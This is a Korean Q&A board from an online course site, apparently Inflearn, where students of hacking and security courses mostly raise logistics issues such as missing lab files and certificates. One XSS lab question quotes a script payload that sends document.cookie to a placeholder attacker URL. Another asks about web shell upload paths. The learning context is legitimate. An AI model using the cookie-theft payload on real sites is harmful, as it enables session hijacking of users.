묻고 답해요
169만명의 커뮤니티!! 함께 토론해봐요.
인프런 TOP Writers
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
XSS 1번 문제
XSS 1번 문제에 왜 Activate admin bot을 특정 XSS한 게시물에 맞춰야 플래그가 나오는지 모르겠습니다. 그리고 <script>location.href = "공격자의 URL/?memo=" + document.cookie;</script> 의 공격 파라미터일 때 공격자의 URL앞에 나오는 /?memo=가 무슨 뜻인지도 궁금해요.
-
미해결BHPT - 호스트 기반 모의해킹 기초
가이드북 애플리케이션 접근 불가
404 Not Found구글 폼 신청 후 메일을 통해 비밀번호 설정 링크를 누를 때 nginx/1.25.4 라고 하면서 접근이 안됩니다. https://guides.redraccoon.kr/books/bhpt/page/bhpt-s5w또한 위에 링크도 동일하게 접근이 안됩니다.
-
미해결RTL - 레드팀 맛보기
수료가 안됩니다
수료증 발급이 필요합니다. 수료를 못하면 해당 강의 비용을 회사에 환수해야하는데, 강의 내용도 없고 자료도 없어서 수료가 안됩니다. 빠르게 조치 부탁드립니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
압축파일 비밀번호
구글 드라이브에서 실습파일 01, 02 ,03 압축파일 받았는데 압축해제 패스워드가 뭐에요?
-
미해결해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
뭘하라는건지 모르겠네요
상단에 sign request 눌러 들어가니버튼을 누르라는데 어디에 있는 무슨 버튼을 누르라는건지...메시지를 보내려면 계정 확인 및 인증을 하라해서 눌렀더니 등록도 안되네요 설명 이해하기 어려우니 현재까지의 절차와 이후 절차까지 설명 부탁 드립니다.
-
미해결화이트해커가 되기 위한 8가지 웹 해킹 기술
한글폰트 오류 있으신 분들!!
저도 찾아보던도중 방법을 찾아서 공유드립니다 sources.list 에서 deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware해당 줄 작성 이후 wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpgapt clean apt update apt install -y fonts-nanum순서대로 입력 하시면 정상 다운로드 됩니다! wget은 해당 저장소 즉 kail 공식 저장소 서명 확인용 키 파일을 최신 파일로 교체하는 명령어 입니다. 그래도 안되시면apt --fix-broken install apt update apt install -y fonts-nanum순서대로 입력해보시길 바랍니당화이팅~!
-
미해결AWS 클라우드 서비스 인프라 구축 이해와 해킹, 보안
iam 권한
iam 권한 ec2read onlyaccess로 하면 키페어 생성이 안돼서 그냥 풀 액세스로 만들고 연결했는데 이젠 연결권한이 없다고 그러네요 그냥 administrator 권한 줘도 보안상 문제는 없는 건가요 ???
-
해결됨시큐어 코딩(Secure Coding) 쪼개기
받을 수도 없는 수업 자료들이 올라와 있고, 이것들 때문에 강의를 수료할 수도 없습니다.
불필요한 강의 자료가 수업 내용에 포함되어 있고, 이게 진도율에 반영되는게 맞는걸까요?수업진도율과 자료가 별개로 처리되어야 할것 같습니다. 그리고 받을 수도 없는 자료들이 올라와 있는데 이 부분 해결이 필요할 것 같습니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
침해사고 샘플분석 첫번째 파일 다운로드 불가
파일 다운로드 링크 접속시 에러페이지 발생파일 구할수있는 다른 경로 알려주시면 감사하겠습니다.
-
미해결윈도우 악성코드(malware) 분석 입문 과정
인터넷 연결은 되는데 구글 검색은 안돼요.
If you're having troble accessing google search, please click here 뜨고 click here, or send feedback으로 뜨고 click here 눌러도 반응 없어요.
-
미해결모의해킹 실무자가 알려주는, 파일 다운로드 취약점 공격 기법과 실무 사례 분석
tomcat 버전정보 문의
tomcat 설치하는데 강의에는 Tomcat 8 버전을 다운로드 하셨는데 현재 tomcat 9 이후 버전만 다운로드 받을 수 있는걸로 확인됩니다.(공식사이트 기준)tomcat9 로 실습해도 상관없을까요?또한 맥북 이용이여서 MAMP 설치 후에 동일하게 실습하는 중인데, 맥도 동일하게 실습 진행하면 되는지 궁금합니다.감사합니다.
-
미해결네이버 클라우드 서비스 인프라 구축 이해와 해킹,보안 모니터링
네이버클라우드의 장점
네이버클라우드 타 AWS나 AZURE 랑 비교했을 때 장점을 자세히 알고 싶습니다.
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
강의자료 요청
IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전을 수강 중입니다. 강의자료에서 pcap_sample파일을 받았지만 섹션2강의들을 수강하면서 해당 실습파일을 찾지 못했습니다. 어디서 찾을 수 있을까요?
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
MsSql php 연결 문의
비트나미는 8.1버전을 사용하고 그에 맞춰 dll을 다운로드 받았습니다. sql sever는 2025로 다운로드 받고 mssql_connect.php를 작성하니 다음과 같은 문제가 발생합니다.
-
미해결모의해킹 실무자가 알려주는, SQL Injection 공격 기법과 시큐어 코딩 : PART 1
APMSETUP 대신에 bitnami를 사용해도 되나요?
ㅈㄱㄴ
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
샘플 패킷 확인 부탁드립니다.
커리큘럼 섹션2 항목 중 아래 영상에서 나오는 샘플 패킷은 어디서 다운이 가능한가요?아무리 찾아도 못찾겠습니다.그리고, 해당 내용이 커리큘럼 섹션2에 나오는게 순서가 맞는지 좀 의아합니다. (섹션3이 먼저 나오고, 2가 나오는게 맞지않나 싶습니다..)침해사고 샘플 사례 분석 문제 및 풀이, 첫번째침해사고 샘플 사례 분석 문제 및 풀이, 두번째
-
미해결IT보안을 위한 와이어샤크 네트워크 패킷 분석 실전
파일이 404에러가 뜨네요..
요청하신 URL을 서버에서 찾을 수 없습니다. 다른 원인은 확인할 수 없습니다.이렇게 404에러가 떠서 파일 사용을 못하고 있습니다 ㅠㅠ
-
해결됨해킹 입문부터 중급까지, 한 번에 배우는 웹해킹
인증 후에도 동일 메시지가 보이네요
https://discord.gg/SYYf2phzs3 통해 디스코드 서버에 입장한 뒤 Sign request를 진행해주세요 😃티켓 발급 후 채팅 상단의 이메일 등록하기 버튼을 통해 등록해주시면 됩니다.가 이메일 인증 후에도 보이네요
-
미해결모의해킹 실무자가 알려주는, 파일 다운로드 취약점 공격 기법과 실무 사례 분석
웹 디렉터리의 절대 경로를 모르는 상태에서 웹 쉘 업로드 방법이 존재할까요?
현재 강의에서 웹 디렉터리를 모르는 상태이지만 웹 쉘을 웹 디렉터리에 업로드 한 상태로 가정하여 실습을 진행해 주셨습니다웹 디렉터리를 파악하지 못한 상태에서, 게싱공격을 제외하고 웹디렉터리에 웹 쉘을 업로드 하는게 가능한가요? 웹 디렉터리를 파악 했다면 경로조작 문자를 이용해서 웹 디렉터리에 파일 업로드가 가능할것 같은데 파악하지 못하여도 가능한지 여부가 궁금합니다.
-
미해결해킹대회(CTF) 출전을 위한 시스템해킹(Pwnable) 입문
retrun 주소값에 브레이크 포인트 걸고
continue 시 thread is running error 가 뜨는데 이유와 해결법을 잘 모르겠습니다
